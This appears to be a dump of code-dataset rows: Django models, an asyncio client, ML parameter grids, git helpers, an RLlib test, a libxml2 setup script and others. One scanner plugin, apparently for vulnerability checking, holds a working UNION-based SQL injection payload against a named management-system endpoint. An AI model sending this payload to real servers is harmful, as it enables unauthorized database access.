blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9c91809b744ff16932feb411b09b7423b511a93b | d83118503614bb83ad8edb72dda7f449a1226f8b | /src/dprj/platinumegg/app/cabaret/models/AppConfig.py | b3e39931ac2f8eb97496fa5f9e2cc1cdee59154c | [] | no_license | hitandaway100/caba | 686fe4390e182e158cd9714c90024a082deb8c69 | 492bf477ac00c380f2b2758c86b46aa7e58bbad9 | refs/heads/master | 2021-08-23T05:59:28.910129 | 2017-12-03T19:03:15 | 2017-12-03T19:03:15 | 112,512,044 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,988 | py | # -*- coding: utf-8 -*-
import settings_sub
from django.db import models
from platinumegg.app.cabaret.models.base.models import Singleton, BaseModel
from platinumegg.lib.opensocial.util import OSAUtil
from platinumegg.app.cabaret.models.base.fields import TinyIntField,\
AppDateTimeField, JsonCharField, PositiveAutoField, ObjectField
from defines import Defines
from platinumegg.app.cabaret.models.base.util import dict_to_choices
class AppConfig(Singleton):
"""メンテナンス設定.
"""
class Meta:
app_label = settings_sub.APP_NAME
abstract = False
maintenancetype = TinyIntField(verbose_name=u'メンテフラグ', choices=dict_to_choices(Defines.MaintenanceType.NAMES), default=Defines.MaintenanceType.EMERGENCY)
stime = AppDateTimeField(default=OSAUtil.get_now, verbose_name=u'メンテ開始時間')
etime = AppDateTimeField(default=OSAUtil.get_now, verbose_name=u'メンテ終了時間')
master = models.PositiveIntegerField(default=0, verbose_name=u'マスターデータ番号')
def is_maintenance(self):
if self.is_emergency():
return True
elif self.stime <= OSAUtil.get_now() < self.etime:
return True
return False
def is_platform_maintenance(self):
"""プラットフォームのメンテか.
"""
return self.maintenancetype in (Defines.MaintenanceType.REGULAR_PLATFORM, Defines.MaintenanceType.EMERGENCY_PLATFORM)
def is_emergency(self):
"""緊急メンテか.
"""
return self.maintenancetype in (Defines.MaintenanceType.EMERGENCY, Defines.MaintenanceType.EMERGENCY_PLATFORM)
@classmethod
def getModel(cls):
model = cls.getSingletonModel()
if model is None:
model = cls()
model.save()
return model
class PreRegistConfig(Singleton):
"""事前登録設定.
"""
class Meta:
app_label = settings_sub.APP_NAME
abstract = False
etime = AppDateTimeField(default=OSAUtil.get_now, verbose_name=u'事前登録終了時間')
prizes = JsonCharField(default=list, verbose_name=u'事前登録報酬')
def is_before_publication(self):
now = OSAUtil.get_now()
if now < self.etime:
return True
return False
class MessageQueue(BaseModel):
"""メッセージAPIのキュー.
"""
class Meta:
app_label = settings_sub.APP_NAME
abstract = False
id = PositiveAutoField(primary_key=True, verbose_name=u'ID')
stime = AppDateTimeField(default=OSAUtil.get_now, verbose_name=u'送信開始時間', db_index=True)
title = models.CharField(max_length=26, verbose_name=u'タイトル')
body = models.CharField(max_length=100, verbose_name=u'本文')
recipients = ObjectField(default=list, verbose_name=u'送信先(未指定の場合は全員)')
jumpto = models.CharField(max_length=100, verbose_name=u'飛び先', blank=True)
| [
"shangye@mail.com"
] | shangye@mail.com |
c9fe70da36618c2cb74ba704579300f060bdfe9c | dcce56815dca2b18039e392053376636505ce672 | /dumpscripts/asyncio_echo_client_coroutine.py | 05309a636fa1c68dedb183a41da0a63c3998acb5 | [] | no_license | robertopauletto/PyMOTW-it_3.0 | 28ff05d8aeccd61ade7d4107a971d9d2576fb579 | c725df4a2aa2e799a969e90c64898f08b7eaad7d | refs/heads/master | 2021-01-20T18:51:30.512327 | 2020-01-09T19:30:14 | 2020-01-09T19:30:14 | 63,536,756 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,366 | py | # asyncio_echo_client_coroutine.py
import asyncio
import logging
import sys
MESSAGES = [
b"Questo e' il messaggio. ",
b"Sara' inviato ",
b'in parti.',
]
SERVER_ADDRESS = ('localhost', 10000)
logging.basicConfig(
level=logging.DEBUG,
format='%(name)s: %(message)s',
stream=sys.stderr,
)
log = logging.getLogger('main')
event_loop = asyncio.get_event_loop()
async def echo_client(address, messages):
log = logging.getLogger('echo_client')
log.debug('connessione a {} porta {}'.format(*address))
reader, writer = await asyncio.open_connection(*address)
# Potrebbe essere writer.writelines() eccetto che
# avrebbe reso più difficile mestrare ciascuna parte del messaggio
# che sta per essere spedito..
for msg in messages:
writer.write(msg)
log.debug('in invio {!r}'.format(msg))
if writer.can_write_eof():
writer.write_eof()
await writer.drain()
log.debug('in attesa di risposta')
while True:
data = await reader.read(128)
if data:
log.debug('ricevuto {!r}'.format(data))
else:
log.debug('in chiusura')
writer.close()
return
try:
event_loop.run_until_complete(
echo_client(SERVER_ADDRESS, MESSAGES)
)
finally:
log.debug('chiusura del ciclo di eventi')
event_loop.close()
| [
"roberto.pauletto@gmail.com"
] | roberto.pauletto@gmail.com |
5aac4802175c9e01e52b360b66fd915af1002463 | e17680647cbaee4d2661246eac1357d7f1de1536 | /apps/organization/migrations/0004_auto_20180519_1313.py | bd9fef39819fa3e7e26363ba7b8ccf81ebee32c0 | [] | no_license | chenjb04/LearnOnline | 0cad4da6917121e889ce03928acd06f0e72313fc | 35dadcc73e3a803ca7756a51bbcc3e408912ab12 | refs/heads/master | 2020-04-26T17:21:43.360876 | 2019-05-06T08:18:43 | 2019-05-06T08:18:43 | 173,710,492 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 373 | py | # Generated by Django 2.0.5 on 2018-05-19 13:13
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('organization', '0003_courseorg_catgory'),
]
operations = [
migrations.RenameField(
model_name='courseorg',
old_name='catgory',
new_name='category',
),
]
| [
"chenjb04@163.com"
] | chenjb04@163.com |
21d3203a342aae2ceed8f3725d137594722bd3ba | 41efe260c251c719f87e883cc97f3c796569c5ce | /deving/pstats_merge.py | 16347e4301e36cb3b64c3fd8be4318a421ce91cc | [] | no_license | orenovadia/deving | f49c4bb7a354d420644afc87c87c163f95ad4987 | 6b18347e43a556599593ec5f09248945966167de | refs/heads/master | 2020-03-10T07:10:47.326670 | 2019-02-10T23:21:18 | 2019-02-10T23:21:18 | 129,256,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | from __future__ import print_function
import pstats
import click
@click.command(name='pstats_merge')
@click.argument(
'from_files',
type=click.Path(exists=True, file_okay=True, dir_okay=False, resolve_path=False),
required=True,
nargs=-1
)
@click.argument(
'to_file',
type=click.Path(exists=False, file_okay=True, dir_okay=False, resolve_path=False),
required=True
)
def pstats_merge(from_files, to_file):
"""
Merges multiple pstat files to one
Using: https://docs.python.org/2/library/profile.html
"""
p = pstats.Stats(*from_files)
p.dump_stats(to_file)
if __name__ == '__main__':
pstats_merge()
| [
"orenovad@gmail.com"
] | orenovad@gmail.com |
bfc3d935394fc6ca878f5a81da542c5dea036d5d | 82d6e248d6498f53455f9ccb40b6ff9667da8f2e | /Params/xgb_cv_params.py | 46a7ba704b2ce3ce71ca634f5f5c6062b486bd36 | [] | no_license | marvinxu-free/data_analysis | 650ddf35443e66c395c8c503cacc328e547298a5 | 7a552959fd6272a54488c59091fa8b820c3f19ce | refs/heads/master | 2020-03-22T04:00:09.938423 | 2018-07-02T16:32:20 | 2018-07-02T16:32:20 | 139,466,395 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,577 | py | # -*- coding: utf-8 -*-
# Project: local-spark
# Author: chaoxu create this file
# Time: 2017/10/13
# Company : Maxent
# Email: chao.xu@maxent-inc.com
from __future__ import print_function, division
xgb_base_params = {
'objective': 'binary:logistic',
# 'objective' : 'binary:logitraw',
'nthread': -1,
# 'scale_pos_weight':scale_ios_ratio,
# 'missing':-6.666,
'seed': 42
}
xgb_test_params = {
'learning_rate': [0.05, 0.1, 0.5],
'n_estimators': range(10, 200, 10),
'max_depth': range(3, 10, 2),
'min_child_weight': range(1, 6, 2),
'gamma': [i / 10.0 for i in range(0, 5)],
'subsample': [i / 10.0 for i in range(6, 10)],
'colsample_bytree': [i / 10.0 for i in range(6, 10)],
'reg_alpha': [0, 0.001, 0.005, 0.01, 0.05],
}
xgb_qiaoda_params = {
'learning_rate': [i / 10.0 for i in range(1, 10)],
'n_estimators': range(1, 20, 1),
'max_depth': range(3, 10, 1),
'min_child_weight': range(1, 10, 1),
'gamma': [i / 10.0 for i in range(1, 10)],
'subsample': [i / 10.0 for i in range(1, 10)],
'colsample_bytree': [i / 10.0 for i in range(1, 10)],
'reg_alpha': [i / 10.0 for i in range(1, 10)],
}
xgb_jd_params = {
'learning_rate': [i / 10.0 for i in range(1, 10)],
'n_estimators': range(1, 20, 1),
'max_depth': range(1, 6, 1),
'min_child_weight': range(1, 10, 1),
'gamma': [i / 10.0 for i in range(1, 5)],
'subsample': [i / 10.0 for i in range(1, 5)],
'colsample_bytree': [i / 10.0 for i in range(1, 5)],
'reg_alpha': [i / 10.0 for i in range(1, 5)],
}
| [
"marvinxu_free@163.com"
] | marvinxu_free@163.com |
d0023e8273cd6e97b2ad2bfdf9a6782d33bfc3e3 | bb109bd629c67a30a57850ebc97f9a9625aa998f | /wmtexe/cmi/git.py | 748d4b4a734ecdbb8b4082128123fa2889aa607b | [
"MIT"
] | permissive | csdms/wmt-exe | b0966f27792be853e8469f12a7e78aea24da6bfa | 9f6e5a20e65765389682161b985cab186db88fce | refs/heads/master | 2022-11-15T06:27:23.589160 | 2022-10-25T23:57:21 | 2022-10-25T23:57:21 | 22,662,428 | 0 | 2 | MIT | 2022-10-25T23:57:22 | 2014-08-05T23:04:09 | Python | UTF-8 | Python | false | false | 1,616 | py | #! /usr/bin/env python
import os
from .utils import which, check_output, system, cd, status
def git_repo_name(url):
(base, _) = os.path.splitext(os.path.basename(url))
return base
def git_repo_sha(url, git=None, branch='master'):
git = git or which('git')
lines = check_output([git, 'ls-remote', url]).strip().split(os.linesep)
shas = dict()
for line in lines:
(sha, name) = line.split()
shas[name] = sha
return shas['refs/heads/{branch}'.format(branch=branch)][:10]
def git_clone(url, git=None, dir='.', branch='master'):
git = git or which('git')
with cd(dir):
system([git, 'init', '-q'])
system([git, 'config', 'remote.origin.url', url])
system([git, 'config', 'remote.origin.fetch',
'+refs/heads/*:refs/remotes/origin/*'])
system([git, 'fetch', 'origin',
'{branch}:refs/remotes/origin/{branch}'.format(branch=branch),
'-n', '--depth=1'])
system([git, 'reset', '--hard',
'origin/{branch}'.format(branch=branch)])
def git_pull(url, dir='.', branch='master'):
with cd(dir):
system(['git', 'checkout', '-q', branch])
system(['git', 'pull', 'origin', '-q',
'refs/heads/{branch}:refs/remotes/origin/{branch}'.format(branch=branch)])
def git_clone_or_update(url, dir='.', branch='master'):
if os.path.isdir(os.path.join(dir, '.git')):
status('Updating %s' % url)
git_pull(url, dir=dir, branch=branch)
else:
status('Cloning %s' % url)
git_clone(url, dir=dir, branch=branch)
| [
"mcflugen@gmail.com"
] | mcflugen@gmail.com |
8f5359219eca321f19a6e87ffc21568d1cd514cd | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02422/s434334605.py | 0f8d8509dfbc38c56d306e2d546cad7fb3863b38 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | S = input()
n = int(input())
for i in range(n):
q = input().split()
q[1] = int(q[1])
q[2] = int(q[2])
if q[0] == "print":
print(S[q[1]:q[2] + 1])
elif q[0] == "reverse":
if q[1] == 0:
S = S[:q[1]] + S[q[2]::-1] + S[q[2] + 1:]
else:
S = S[:q[1]] + S[q[2]:q[1] - 1:-1] + S[q[2] + 1:]
elif q[0] == "replace":
S = S[:q[1]] + q[3] + S[q[2] + 1:] | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
fdd3bcccc3ab81cc1c4dd4ecddb857fc92b52c6c | 8f24e443e42315a81028b648e753c50967c51c78 | /rllib/algorithms/td3/tests/test_td3.py | 977c91fea4939895fe9cb6997559ab256cd0dcd1 | [
"MIT",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | simon-mo/ray | d07efdada8d05c6e10417f96e8dfc35f9ad33397 | 1e42e6cd15e2fb96c217cba8484e59ed0ef4b0c8 | refs/heads/master | 2023-03-06T00:09:35.758834 | 2022-12-23T18:46:48 | 2022-12-23T18:46:48 | 122,156,396 | 4 | 2 | Apache-2.0 | 2023-03-04T08:56:56 | 2018-02-20T04:47:06 | Python | UTF-8 | Python | false | false | 4,032 | py | import numpy as np
import unittest
import ray
import ray.rllib.algorithms.td3 as td3
from ray.rllib.utils.framework import try_import_tf
from ray.rllib.utils.test_utils import (
check,
check_compute_single_action,
check_train_results,
framework_iterator,
)
tf1, tf, tfv = try_import_tf()
class TestTD3(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
ray.init()
@classmethod
def tearDownClass(cls) -> None:
ray.shutdown()
def test_td3_compilation(self):
"""Test whether TD3 can be built with both frameworks."""
config = td3.TD3Config()
# Test against all frameworks.
for _ in framework_iterator(config, with_eager_tracing=True):
algo = config.build(env="Pendulum-v1")
num_iterations = 1
for i in range(num_iterations):
results = algo.train()
check_train_results(results)
print(results)
check_compute_single_action(algo)
algo.stop()
def test_td3_exploration_and_with_random_prerun(self):
"""Tests TD3's Exploration (w/ random actions for n timesteps)."""
config = td3.TD3Config().environment(env="Pendulum-v1")
no_random_init = config.exploration_config.copy()
random_init = {
# Act randomly at beginning ...
"random_timesteps": 30,
# Then act very closely to deterministic actions thereafter.
"stddev": 0.001,
"initial_scale": 0.001,
"final_scale": 0.001,
}
obs = np.array([0.0, 0.1, -0.1])
# Test against all frameworks.
for _ in framework_iterator(config, with_eager_tracing=True):
config.exploration(exploration_config=no_random_init)
# Default GaussianNoise setup.
algo = config.build()
# Setting explore=False should always return the same action.
a_ = algo.compute_single_action(obs, explore=False)
check(algo.get_policy().global_timestep, 1)
for i in range(50):
a = algo.compute_single_action(obs, explore=False)
check(algo.get_policy().global_timestep, i + 2)
check(a, a_)
# explore=None (default: explore) should return different actions.
actions = []
for i in range(50):
actions.append(algo.compute_single_action(obs))
check(algo.get_policy().global_timestep, i + 52)
check(np.std(actions), 0.0, false=True)
algo.stop()
# Check randomness at beginning.
config.exploration(exploration_config=random_init)
algo = config.build()
# ts=0 (get a deterministic action as per explore=False).
deterministic_action = algo.compute_single_action(obs, explore=False)
check(algo.get_policy().global_timestep, 1)
# ts=1-29 (in random window).
random_a = []
for i in range(1, 30):
random_a.append(algo.compute_single_action(obs, explore=True))
check(algo.get_policy().global_timestep, i + 1)
check(random_a[-1], deterministic_action, false=True)
self.assertTrue(np.std(random_a) > 0.3)
# ts > 30 (a=deterministic_action + scale * N[0,1])
for i in range(50):
a = algo.compute_single_action(obs, explore=True)
check(algo.get_policy().global_timestep, i + 31)
check(a, deterministic_action, rtol=0.1)
# ts >> 30 (BUT: explore=False -> expect deterministic action).
for i in range(50):
a = algo.compute_single_action(obs, explore=False)
check(algo.get_policy().global_timestep, i + 81)
check(a, deterministic_action)
algo.stop()
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", __file__]))
| [
"noreply@github.com"
] | simon-mo.noreply@github.com |
123fa1bf54e8b6e07efb17bac26e992b93729f39 | ff6248be9573caec94bea0fa2b1e4b6bf0aa682b | /output/StudentProblem/10.21.11.45/3/1569578443.py | 1753098b316b763fb20e3410fc4080977f4d3725 | [] | no_license | LennartElbe/codeEvo | 0e41b1a7705204e934ef71a5a28c047366c10f71 | e89b329bc9edd37d5d9986f07ca8a63d50686882 | refs/heads/master | 2020-12-21T17:28:25.150352 | 2020-03-26T10:22:35 | 2020-03-26T10:22:35 | 236,498,032 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 842 | py | ============================= test session starts ==============================
platform darwin -- Python 3.7.4, pytest-5.4.1, py-1.8.1, pluggy-0.13.1
rootdir: /tmp
collected 1 item
../../../../../tmp F [100%]
=================================== FAILURES ===================================
_____________________________________ test _____________________________________
def test():
"""tested leap funktion"""
assert leap(2004)
> assert leap(2001)
E assert False
E + where False = leap(2001)
/private/tmp/blabla.py:19: AssertionError
=========================== short test summary info ============================
FAILED ../../../../../tmp/::test - assert False
============================== 1 failed in 0.06s ===============================
| [
"lenni.elbe@gmail.com"
] | lenni.elbe@gmail.com |
e5220636500572d14722d578ed0d36e272a73c4c | d5125ccc1ef9915ffd72c575225a620aac5cb347 | /development/django_test_project/django_mysite/blog/models.py | dec8106056e3e47a4cc70ec40a2e11f392eae651 | [] | no_license | yurui829/stefanbo | 2231074e0e4f04438aff647563299ad1947bd760 | 449f862c81a3b4ae3e079ecb4a15b3a5cbcca701 | refs/heads/master | 2021-01-24T23:42:52.064783 | 2014-07-02T03:05:04 | 2014-07-02T03:05:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,119 | py | from django.db import models
# import easy_thumbnail
from easy_thumbnails.fields import ThumbnailerImageField
############################################################
class BlogPost(models.Model):
title = models.CharField(max_length=150)
body = models.TextField()
timestamp = models.DateTimeField()
#############################################################
class Item(models.Model):
name = models.CharField(max_length=250)
description = models.TextField()
class Meta:
ordering = ['name']
def __unicode__(self):
return self.name
@models.permalink
def get_absolute_url(self):
return ('item_detail', None, {'object_id': self.id})
class Photo(models.Model):
item = models.ForeignKey(Item)
title = models.CharField(max_length=100)
image = ThumbnailerImageField(upload_to='photos', blank=True)
caption = models.CharField(max_length=250, blank=True)
def __unicode__(self):
return self.title
#class Meta:
# ordering = ['title']
#def __unicode__(self):
# return self.title
#@models.permalink
#def get_absolute_url(self):
# return ('photo_detail', None, {'object_id': self.id})
| [
"stefan_bo@163.com"
] | stefan_bo@163.com |
cce604d7c87324c908134270009a9e2f9e3e3505 | bd9a09a3f1a8b2b5166c540ada93cc5b30591605 | /scanner/plugins/cms/others/hnkj_researchinfo_dan_sqli.py | 45e7bf7e021770805dc12e1b41a3c2330a28bc57 | [
"MIT"
] | permissive | iceyhexman/onlinetools | 3cb6e349fc30c515f96429abeab5fbcc430ac0cc | 61f2df7ff8e6ad97ca7901728c3ab749679a2bd0 | refs/heads/master | 2023-08-06T19:31:51.328657 | 2022-10-28T04:01:38 | 2022-10-28T04:01:38 | 119,565,769 | 1,662 | 358 | MIT | 2023-03-31T14:34:13 | 2018-01-30T16:51:46 | Python | UTF-8 | Python | false | false | 1,064 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: 汇能群管理系统SQL注入
referer: http://wooyun.org/bugs/wooyun-2010-0152664
author: Lucifer
description: 链接/main/model/childcatalog/researchinfo_dan.jsp?researchId=1中 researchID未过滤存在SQL注入漏洞
'''
import sys
import requests
class hnkj_researchinfo_dan_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
payload = "/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27)),3%20from%20H_System_User--"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
return "[+]存在汇能群管理系统 SQL注入漏洞...(高危)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = hnkj_researchinfo_dan_sqli_BaseVerify(sys.argv[1])
testVuln.run() | [
"834430486@qq.com"
] | 834430486@qq.com |
a34bf01cdd8b3293561d1ade7fa2babcf4b1d786 | 7034b7dec4a068493adde012e576891cb60c8d1e | /python/setup.py | f80a66c4f82ee2e5adb8436f2e19d3106f5beb50 | [
"MIT",
"LicenseRef-scancode-x11-xconsortium-veillard"
] | permissive | OpenCMISS-Dependencies/libxml2 | 4ed6741cfc7a9c89b03972422522203b28e6fc16 | 29930a028df0e92e6cec778f461194acc16d9c04 | refs/heads/v2.7.6 | 2022-05-02T03:33:26.421280 | 2022-04-26T21:26:34 | 2022-04-26T21:26:34 | 3,723,092 | 0 | 5 | NOASSERTION | 2021-04-19T21:25:51 | 2012-03-14T22:40:54 | C | UTF-8 | Python | false | false | 6,679 | py | #!/usr/bin/python -u
#
# Setup script for libxml2 and libxslt if found
#
import sys, os
from distutils.core import setup, Extension
# Below ROOT, we expect to find include, include/libxml2, lib and bin.
# On *nix, it is not needed (but should not harm),
# on Windows, it is set by configure.js.
ROOT = r'/usr'
# Thread-enabled libxml2
with_threads = 1
# If this flag is set (windows only),
# a private copy of the dlls are included in the package.
# If this flag is not set, the libxml2 and libxslt
# dlls must be found somewhere in the PATH at runtime.
WITHDLLS = 1 and sys.platform.startswith('win')
def missing(file):
if os.access(file, os.R_OK) == 0:
return 1
return 0
try:
HOME = os.environ['HOME']
except:
HOME="C:"
if WITHDLLS:
# libxml dlls (expected in ROOT/bin)
dlls = [ 'iconv.dll','libxml2.dll','libxslt.dll','libexslt.dll' ]
dlls = map(lambda dll: os.path.join(ROOT,'bin',dll),dlls)
# create __init__.py for the libxmlmods package
if not os.path.exists("libxmlmods"):
os.mkdir("libxmlmods")
open("libxmlmods/__init__.py","w").close()
def altImport(s):
s = s.replace("import libxml2mod","from libxmlmods import libxml2mod")
s = s.replace("import libxsltmod","from libxmlmods import libxsltmod")
return s
if sys.platform.startswith('win'):
libraryPrefix = 'lib'
platformLibs = []
else:
libraryPrefix = ''
platformLibs = ["m","z"]
# those are examined to find
# - libxml2/libxml/tree.h
# - iconv.h
# - libxslt/xsltconfig.h
includes_dir = [
"/usr/include",
"/usr/local/include",
"/opt/include",
os.path.join(ROOT,'include'),
HOME
];
xml_includes=""
for dir in includes_dir:
if not missing(dir + "/libxml2/libxml/tree.h"):
xml_includes=dir + "/libxml2"
break;
if xml_includes == "":
print "failed to find headers for libxml2: update includes_dir"
sys.exit(1)
iconv_includes=""
for dir in includes_dir:
if not missing(dir + "/iconv.h"):
iconv_includes=dir
break;
if iconv_includes == "":
print "failed to find headers for libiconv: update includes_dir"
sys.exit(1)
# those are added in the linker search path for libraries
libdirs = [
os.path.join(ROOT,'lib'),
]
xml_files = ["libxml2-api.xml", "libxml2-python-api.xml",
"libxml.c", "libxml.py", "libxml_wrap.h", "types.c",
"xmlgenerator.py", "README", "TODO", "drv_libxml2.py"]
xslt_files = ["libxslt-api.xml", "libxslt-python-api.xml",
"libxslt.c", "libxsl.py", "libxslt_wrap.h",
"xsltgenerator.py"]
if missing("libxml2-py.c") or missing("libxml2.py"):
try:
try:
import xmlgenerator
except:
import generator
except:
print "failed to find and generate stubs for libxml2, aborting ..."
print sys.exc_type, sys.exc_value
sys.exit(1)
head = open("libxml.py", "r")
generated = open("libxml2class.py", "r")
result = open("libxml2.py", "w")
for line in head.readlines():
if WITHDLLS:
result.write(altImport(line))
else:
result.write(line)
for line in generated.readlines():
result.write(line)
head.close()
generated.close()
result.close()
with_xslt=0
if missing("libxslt-py.c") or missing("libxslt.py"):
if missing("xsltgenerator.py") or missing("libxslt-api.xml"):
print "libxslt stub generator not found, libxslt not built"
else:
try:
import xsltgenerator
except:
print "failed to generate stubs for libxslt, aborting ..."
print sys.exc_type, sys.exc_value
else:
head = open("libxsl.py", "r")
generated = open("libxsltclass.py", "r")
result = open("libxslt.py", "w")
for line in head.readlines():
if WITHDLLS:
result.write(altImport(line))
else:
result.write(line)
for line in generated.readlines():
result.write(line)
head.close()
generated.close()
result.close()
with_xslt=1
else:
with_xslt=1
if with_xslt == 1:
xslt_includes=""
for dir in includes_dir:
if not missing(dir + "/libxslt/xsltconfig.h"):
xslt_includes=dir + "/libxslt"
break;
if xslt_includes == "":
print "failed to find headers for libxslt: update includes_dir"
with_xslt = 0
descr = "libxml2 package"
modules = [ 'libxml2', 'drv_libxml2' ]
if WITHDLLS:
modules.append('libxmlmods.__init__')
c_files = ['libxml2-py.c', 'libxml.c', 'types.c' ]
includes= [xml_includes, iconv_includes]
libs = [libraryPrefix + "xml2"] + platformLibs
macros = []
if with_threads:
macros.append(('_REENTRANT','1'))
if with_xslt == 1:
descr = "libxml2 and libxslt package"
if not sys.platform.startswith('win'):
#
# We are gonna build 2 identical shared libs with merge initializing
# both libxml2mod and libxsltmod
#
c_files = c_files + ['libxslt-py.c', 'libxslt.c']
xslt_c_files = c_files
macros.append(('MERGED_MODULES', '1'))
else:
#
# On windows the MERGED_MODULE option is not needed
# (and does not work)
#
xslt_c_files = ['libxslt-py.c', 'libxslt.c', 'types.c']
libs.insert(0, libraryPrefix + 'exslt')
libs.insert(0, libraryPrefix + 'xslt')
includes.append(xslt_includes)
modules.append('libxslt')
extens=[Extension('libxml2mod', c_files, include_dirs=includes,
library_dirs=libdirs,
libraries=libs, define_macros=macros)]
if with_xslt == 1:
extens.append(Extension('libxsltmod', xslt_c_files, include_dirs=includes,
library_dirs=libdirs,
libraries=libs, define_macros=macros))
if missing("MANIFEST"):
manifest = open("MANIFEST", "w")
manifest.write("setup.py\n")
for file in xml_files:
manifest.write(file + "\n")
if with_xslt == 1:
for file in xslt_files:
manifest.write(file + "\n")
manifest.close()
if WITHDLLS:
ext_package = "libxmlmods"
if sys.version >= "2.2":
base = "lib/site-packages/"
else:
base = ""
data_files = [(base+"libxmlmods",dlls)]
else:
ext_package = None
data_files = []
setup (name = "libxml2-python",
# On *nix, the version number is created from setup.py.in
# On windows, it is set by configure.js
version = "2.7.6",
description = descr,
author = "Daniel Veillard",
author_email = "veillard@redhat.com",
url = "http://xmlsoft.org/python.html",
licence="MIT Licence",
py_modules=modules,
ext_modules=extens,
ext_package=ext_package,
data_files=data_files,
)
sys.exit(0)
| [
"h.sorby@auckland.ac.nz"
] | h.sorby@auckland.ac.nz |
af3fb2b3688a0e354caa5b88c3565eebf0664c0f | 77900cdd9a815caf1cd04705321ca93f5072179f | /Project/.history/product_20211026231719.py | 291ef58343af0bae5fbd6dccf33cceea045d6ea9 | [] | no_license | Bom19990111/helloword_python | 717799d994223d65de5adaeabecf396ff2bc1fb7 | 2ee2e67a60043f03c1ce4b070470c7d2dcdc72a7 | refs/heads/master | 2023-09-06T04:17:02.057628 | 2021-11-21T20:00:46 | 2021-11-21T20:00:46 | 407,063,273 | 0 | 1 | null | 2021-11-21T20:00:47 | 2021-09-16T07:18:35 | Python | UTF-8 | Python | false | false | 6,967 | py | import data as list_product
import random
def __init__(self, Id, Product_code, Product_name, Brand, Year, Size):
self.Id = Id
self.Product_code = Product_code
self.Product_name = Product_name
self.Brand = Brand
self.Year = Year
self.Size = Size
# Thêm sản phẩm
def AddProduct():
print("THÊM SẢN PHẨM")
product = {
"Id": "",
"Product_code": "",
"Product_name": "",
"Brand": "",
"Price": "",
"Year": "",
"Quantity": "",
"Size": ""
}
print("Nhập ID sản phẩm:")
Id = int(input())
while True:
student = FindProductDuplicate(Id)
if student != False:
print("ID đã tồn tại, vui lòng nhập lại ID:")
Id = int(input())
else:
break
product['Id'] = Id
# Mã sản phẩm random
code_product = random.randint(1, 99)
str_id = "HKSP"
if code_product <= 9:
str_id += "0" + str(code_product)
else:
str_id += str(code_product)
product["Product_code"] = str_id
print("Nhập tên sản phẩm: ")
product['Product_name'] = input()
print("Nhập thương hiệu sản phẩm: ")
product['Brand'] = input()
print("Nhập giá sản phẩm: ")
product['Price'] = float(input())
print("Nhập năm sản xuất: ")
product['Year'] = int(input())
print("Nhập số lượng: ")
product['Quantity'] = int(input())
print("Nhập size giày: ")
product['Size'] = input()
list_product.list_product.append(product)
answer = input("Bạn có muốn nhập tiếp không? Y/N ")
if answer == "y" or answer == "Y":
AddProduct()
# Tìm kiếm ID trùng lặp
def FindProductDuplicate(Id):
for i in range(0, len(list_product.list_product)):
if list_product.list_product[i]['Id'] == Id:
return [i, list_product.list_product[i]]
return False
# Hiển thị tất cả sản phẩm
def ShowAllProduct():
print("*** HIỂN THỊ TẤT CẢ SẢN PHẨM ***")
if len(list_product.list_product) == 0 or len(list_product.list_product) < 0:
print("Chưa có sản phẩm nào để hiển thị! ".upper())
for i in range(0, len(list_product.list_product)):
print("ID: ", list_product.list_product[i]['Id']),
print("Mã sản phẩm: ", list_product.list_product[i]['Product_code']),
print("Tên sản phẩm: ", list_product.list_product[i]['Product_name']),
print("Thương hiệu: ", list_product.list_product[i]['Brand']),
print("Giá: ", list_product.list_product[i]['Price']),
print("Năm xuất bản: ", list_product.list_product[i]['Year']),
print("Số lượng: ", list_product.list_product[i]['Quantity']),
print("Size giày: ", list_product.list_product[i]['Size'])
print("________________________________")
# Sửa thông tin sản phẩm
def UpdateProduct():
